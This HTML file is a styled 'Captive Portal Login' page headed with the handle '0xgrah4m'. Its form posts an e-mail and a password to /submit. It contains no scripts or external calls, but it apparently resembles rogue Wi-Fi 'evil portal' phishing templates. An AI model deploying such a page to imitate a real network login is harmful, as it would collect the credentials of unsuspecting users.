<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Captive Portal Login</title>
    <style>
        body {
            background-color: #000;
            color: #fff;
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            width: 40%;
            padding: 38px;
            text-align: center;
            background-color: black;
            border-radius: 5px;
            box-shadow: 0 0 20px rgba(255, 0, 0, 0.5);
            margin-top: 20px;
        }

        h2 {
            margin-bottom: 20px;
            text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.8);
        }

        input[type="text"],
        input[type="password"],
        button {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: none;
            border-radius: 3px;
        }

        button {
            background-color: red;
            color: #fff;
            cursor: pointer;
            font-weight: bold;
        }

        p {
            margin-top: 10px;
        }

        a {
            color: #bbb;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>0xgrah4m</h2>
        <form action="/submit" method="POST">
            <input type="text" name="username" placeholder="E-mail" required><br><br>
            <input type="password" name="password" placeholder="Password" required><br><br>
            <button type="submit">Login</button>
        </form>
    </div>
</body>
</html>
